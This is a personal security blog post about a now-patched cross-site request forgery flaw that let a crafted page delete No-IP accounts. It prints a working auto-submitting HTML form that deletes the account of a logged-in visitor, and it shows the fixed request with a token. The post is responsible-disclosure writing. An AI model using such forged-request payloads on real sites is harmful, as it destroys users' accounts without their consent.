A Flashback of my Childhood – NOIP XSRF

No-Ip is a free DNS providing service for users. I’ve signed up for an account when I was at the age of eleven long times back. Mainly I used it for configuring my RATs (Remote Administration Tools) for forwarding the connection from the No-IP DNS to my external IP. So it was long time back and I just used it for testing purposes only. After that I’ve never wanted to use a DNS service for any reason. One day I accidently visited no-ip and to my surprise my previous account was still active which I created long time back 🙂

I did not have any intention of finding any kind of vulnerability. But at that moment my Burp Suite was in intercepting mode and I was experimenting with another web application. I created a new no-ip account for testing some of my reverse tcp dns shells. After the testing was done I just deleted my account since it was a fake random account. As time passed by testing my other application and my shells I saw the HTTP request of the deletion of my fake no-ip account in the history. It had no XSRF token used. W00t! I was able to delete any account when the user just opens my malicious request. Well, Here is the proof of concept.

<html>
  <!--
	Title: NOIP.COM Permanent Delete Account Exploit
	Author: Osanda Malith (@OsandaMalith)
	Date: 05th April 2014
  -->
  <body>
    <form name="exploit" action="https://www.noip.com/members/account/delete.php" method="POST">
      <input type="hidden" name="deleteAccount" value="yes" />
      <input type="hidden" name="delete" value="delete" />
      <input type="hidden" name="submit" value="Change" />
      <script>document.exploit.submit(); </script>
    </form>
  </body>
</html>

As soon as I found this I reported it to NoIP and I got rewarded with two t-shirts, some stickers and a nice letter 🙂

Now the issue is patched as they have a valid token.

POST /members/account/delete.php HTTP/1.1
Host: www.noip.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.noip.com/members/account/delete.php
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 58

token=glXd3wIAPR8y2y9O&delete=delete&submit=Delete+Account

So this bug made me remind of my child hood 🙂 Nothing serious it’s just XSRF. I never used DNS services for spreading malware or anything unethical. Basically when I was a kid for my curiosity to learn.

Advertisements

3 thoughts on “A Flashback of my Childhood – NOIP XSRF

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s